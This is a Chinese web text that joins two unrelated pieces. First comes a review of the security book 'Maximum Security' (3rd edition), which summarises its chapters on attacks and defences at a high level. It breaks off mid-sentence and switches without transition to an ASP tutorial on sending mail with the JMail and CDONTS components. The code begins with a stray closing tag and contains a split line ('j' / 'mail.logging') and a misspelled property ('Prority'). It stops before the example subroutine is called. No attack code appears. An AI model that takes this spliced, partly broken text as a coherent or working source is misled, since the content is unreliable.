　　前兩部分無(wú)疑只是個(gè)熱身，該書從第III部分開始漸入佳境，這部分共有三章，第7章欺騙攻擊，第8章隱藏標(biāo)識(shí)以及第9章揭開黑客攻擊的神秘面紗，詳細(xì)地介紹了入侵的場(chǎng)景，其中涉及到黑客工具箱。通過(guò)閱讀，將使讀者得以了解到各種的Internet工具和這些工具的擴(kuò)展信息，包括工具的編寫者、使用者、工作原理以及如何從中受益。第9章則仔細(xì)地陳述了一些諸如攻擊發(fā)生的時(shí)間，攻擊者的類型，解密使用的操作系統(tǒng)，是否有典型的攻擊，誰(shuí)是最頻繁的攻擊對(duì)象，以及攻擊動(dòng)機(jī)是什么這些問題。
　　第IV部分則介紹了可以用于防止惡意攻擊的各種工具、工具集和商用產(chǎn)品，第10章防火墻，第11章安全評(píng)估工具（掃描器），第12章入侵檢測(cè)系統(tǒng)（IDS），第13章日志和監(jiān)聽工具，第14章口令破譯，第15章嗅探器（指能捕獲網(wǎng)絡(luò)報(bào)文的設(shè)備。嗅探器的正當(dāng)用處是為了分析網(wǎng)絡(luò)流量并找出可能出現(xiàn)問題的區(qū)域。例如網(wǎng)絡(luò)中某一段工作不正常：數(shù)據(jù)包的傳輸速度非常慢或者某臺(tái)機(jī)器通過(guò)網(wǎng)絡(luò)啟動(dòng)時(shí)死機(jī)了，這時(shí)就可以使用嗅探器來(lái)判斷問題到底出現(xiàn)在什么地方。）
　　第V部分介紹了目前計(jì)算機(jī)界最惡毒的三類攻擊，對(duì)這些會(huì)給系統(tǒng)和網(wǎng)絡(luò)造成破壞的工具進(jìn)行了深入的剖析。該部分包括第16章拒絕服務(wù)攻擊，第17章病毒和蠕蟲以及第18章特洛伊木馬，作者在每章的小結(jié)處均會(huì)總結(jié)出相應(yīng)的抵御惡意攻擊的辦法。當(dāng)然，解決的方法必須是綜合考慮的，正如談到特洛伊木馬的防范，書中就提出對(duì)于Window和UNIX系統(tǒng)，不僅要檢測(cè)特洛伊木馬，還要檢測(cè)系統(tǒng)的一致性，從而降低系統(tǒng)受到特洛伊木馬攻擊的概率。雖然實(shí)現(xiàn)起來(lái)會(huì)有一定的困難，但是通過(guò)工作站是可以實(shí)現(xiàn)的。一致性管理、從初次安裝系統(tǒng)就有效地備份數(shù)據(jù)、嚴(yán)格的用戶管理安裝和執(zhí)行經(jīng)過(guò)認(rèn)證的軟件，只有將這些方法相結(jié)合才能更有效地抵御該類攻擊。
　　第VI部分"平臺(tái)與安全性"轉(zhuǎn)入闡述如何防止特定的計(jì)算機(jī)和操作系統(tǒng)遭受惡意攻擊，包括以下各種平臺(tái)系統(tǒng)，常用的有Microsoft操作系統(tǒng)、UNIX和Novell NetWare，而一些專用的操作平臺(tái)，如Cisco IOS、Macintosh和VAX/VMS也在書中得到了充分的涉及，這方面的內(nèi)容正好能填補(bǔ)讀者在知識(shí)上的盲點(diǎn)，這也充分地體現(xiàn)了作者對(duì)整個(gè)安全領(lǐng)域的認(rèn)識(shí)是既有深度又有廣度，也是這本書與眾不同的又一佐證。例如，書中提到VAX/VMS在這個(gè)游戲的年代是廢棄的系統(tǒng)，然而并未退出競(jìng)爭(zhēng)。作者認(rèn)為，如果打算在Internet安全領(lǐng)域中謀求一個(gè)職位，就必須在VMS方面進(jìn)行一定程度的學(xué)習(xí)。
　　第VII部分"綜合應(yīng)用"，顧名思義是作者將之前所講述的所有內(nèi)容綜合起來(lái)，形成一種較為復(fù)雜的信息安全戰(zhàn)略。作者的觀點(diǎn)恰恰代表了廣大安全工作者的心聲"安全是一個(gè)過(guò)程，不是功能部件，要求扎實(shí)的但不是無(wú)法完成的工作"，對(duì)安全的考慮不應(yīng)該在應(yīng)用軟件、系統(tǒng)或產(chǎn)品開發(fā)周期完成后就結(jié)束。它是一個(gè)持續(xù)的過(guò)程，應(yīng)該在應(yīng)用軟件使用期限的整個(gè)過(guò)程中一直進(jìn)行。安全性涉及的技術(shù)細(xì)節(jié)要求大量的時(shí)間、經(jīng)驗(yàn)和掌握的暴露程度。安全意識(shí)、以及從安全觀點(diǎn)分析的能力使得設(shè)計(jì)人員、開發(fā)人員和他們的管理人員能夠確定問題并做出響應(yīng)，這樣就有助于創(chuàng)建一個(gè)設(shè)計(jì)良好的、可靠的和安全的應(yīng)用軟件。
　　這是一本幾乎完美的作品，精彩延續(xù)到最后的附錄部分。從圖書信息，到能幫助讀者進(jìn)一步理解安全問題的站點(diǎn)，最后到如何獲得具體廠家的安全信息，書中都一一作出了指引。
　　《最高安全機(jī)密》（第3版）這本書中的豐富內(nèi)容讓讀者掌握到很多關(guān)于安全的理論和方法，作者的奇異經(jīng)歷也使人們得以獲取更多寶貴的實(shí)戰(zhàn)經(jīng)驗(yàn)，更重要的是，你可以從中體會(huì)一名真正黑客的思路。書名中的"最高（Maximum）"一詞展示著作者的自信，對(duì)于認(rèn)識(shí)到信息安全重要性的讀者，這是一部不容錯(cuò)過(guò)的頂級(jí)著作，相信讀過(guò)該書的朋友們都會(huì)與我同感。在此，我把它推薦給所有關(guān)心安全的朋友們閱讀

Set jmail = Server.CreateObject("JMAIL.SMTPMail") '創(chuàng)建一個(gè)JMAIL對(duì)象
jmail.silent = true 'JMAIL不會(huì)拋出例外錯(cuò)誤，返回的值為FALSE跟TRUE
jmail.logging = true '啟用使用日志
jmail.Charset = "GB2312" '郵件文字的代碼為簡(jiǎn)體中文
jmail.ContentType = "text/html" '郵件的格式為HTML的
jmail.ServerAddress = "Server Address" '發(fā)送郵件的服務(wù)器
jmail.AddRecipient Email '郵件的收件人
jmail.SenderName = "SenderName" '郵件發(fā)送者的姓名
jmail.Sender = "Email Address" '郵件發(fā)送者的郵件地址
jmail.Priority = 1 '郵件的緊急程序，1 為最快，5 為最慢， 3 為默認(rèn)值
jmail.Subject = "Mail Subject" '郵件的標(biāo)題
jmail.Body = "Mail Body" '郵件的內(nèi)容
jmail.AddRecipientBCC Email '密件收件人的地址
jmail.AddRecipientCC Email '郵件抄送者的地址
jmail.Execute() '執(zhí)行郵件發(fā)送
jmail.Close '關(guān)閉郵件對(duì)象
%>

　　w3 Jmail4.3組件重新設(shè)計(jì)了其內(nèi)部結(jié)構(gòu)——使用Message對(duì)象代替原來(lái)的單一對(duì)象Jmail.smtpmail發(fā)送郵件，有些方法需要身份驗(yàn)證的(如163、yahoo等)，可以用下面的方法解決：
<%
Set jmail = Server.CreateObject("JMAIL.Message") '建立發(fā)送郵件的對(duì)象
jmail.silent = true '屏蔽例外錯(cuò)誤，返回FALSE跟TRUE兩值j
mail.logging = true '啟用郵件日志
jmail.Charset = "GB2312" '郵件的文字編碼為國(guó)標(biāo)
jmail.ContentType = "text/html" '郵件的格式為HTML格式
jmail.AddRecipient Email '郵件收件人的地址
jmail.From = "Email From for Sender" '發(fā)件人的E-MAIL地址
jmail.MailServerUserName = "UserName of Email" '登錄郵件服務(wù)器所需的用戶名
jmail.MailServerPassword = "Password of Email" '登錄郵件服務(wù)器所需的密碼
jmail.Subject = "Mail Subject" '郵件的標(biāo)題
jmail.Body = "Mail Body" '郵件的內(nèi)容
jmail.Prority = 1 '郵件的緊急程序，1 為最快，5 為最慢， 3 為默認(rèn)值
jmail.Send("Server Address") '執(zhí)行郵件發(fā)送（通過(guò)郵件服務(wù)器地址）
jmail.Close() '關(guān)閉對(duì)象
%>

　　再講一下微軟自帶的CDONTS組件的發(fā)信的方法：

<%
Set cdomail = Server.CreateObject("CDONTS.NewMail") '建立郵件對(duì)象
cdomail.Subject = "Mail Subject" '郵件標(biāo)題
cdomail.From = "Sender's Mail" '發(fā)件人的地址
cdomail.To = "Email will from" '收件人的地址
cdomail.Body = "Mail Body" '郵件的內(nèi)容
cdomail.Send '執(zhí)行發(fā)送
%>

　　這種方法發(fā)送郵件是最簡(jiǎn)單的，同時(shí)也帶來(lái)一定的問題，就是很少有服務(wù)器會(huì)開這項(xiàng)服務(wù)！

　　我們寫程序，一般情況下都是說(shuō)要代碼模塊化，這樣方便維護(hù)，同時(shí)也方便移植。因此，我在這里將這個(gè)發(fā)郵件的寫成一個(gè)子程，在調(diào)用的時(shí)候可以直接調(diào)用（當(dāng)然，如果你高興寫成函數(shù)的話也是可以的，這個(gè)主要是看個(gè)人興趣）：

<%
'參數(shù)說(shuō)明
'Subject : 郵件標(biāo)題
'MailAddress : 發(fā)件服務(wù)器的地址,如smtp.163.com
'Email : 收件人郵件地址
'Sender : 發(fā)件人姓名
'Content : 郵件內(nèi)容
'Fromer : 發(fā)件人的郵件地址

Sub SendAction(subject, mailaddress, email, sender, content, fromer)
Set jmail = Server.CreateObject("JMAIL.SMTPMail") '創(chuàng)建一個(gè)JMAIL對(duì)象
jmail.silent = true 'JMAIL不會(huì)拋出例外錯(cuò)誤，返回的值為FALSE跟TRUE
jmail.logging = true '啟用使用日志
jmail.Charset = "GB2312" '郵件文字的代碼為簡(jiǎn)體中文
jmail.ContentType = "text/html" '郵件的格式為HTML的
jmail.ServerAddress = mailaddress '發(fā)送郵件的服務(wù)器
jmail.AddRecipient Email '郵件的收件人
jmail.SenderName = sender '郵件發(fā)送者的姓名
jmail.Sender = fromer '郵件發(fā)送者的郵件地址
jmail.Priority = 1 '郵件的緊急程序，1 為最快，5 為最慢， 3 為默認(rèn)值
jmail.Subject = subject '郵件的標(biāo)題
jmail.Body = content '郵件的內(nèi)容
'由于沒有用到密抄跟抄送，這里屏蔽掉這兩句，如果您有需要的話，可以在這里恢復(fù)
'jmail.AddRecipientBCC Email '密件收件人的地址
'jmail.AddRecipientCC Email '郵件抄送者的地址
jmail.Execute() '執(zhí)行郵件發(fā)送
jmail.Close '關(guān)閉郵件對(duì)象
End Sub

'調(diào)用此Sub的例子
Dim strSubject,strEmail,strMailAdress,strSender,strContent,strFromer
strSubject = "這是一封用JMAIL發(fā)送的測(cè)試郵件"
strContent = "JMail組件發(fā)送測(cè)試成功！"
strEmail = "FAQ@xxby.com"
strFromer = "FAQ@xxby.com"
strMailAddress = "mail.xxby.com"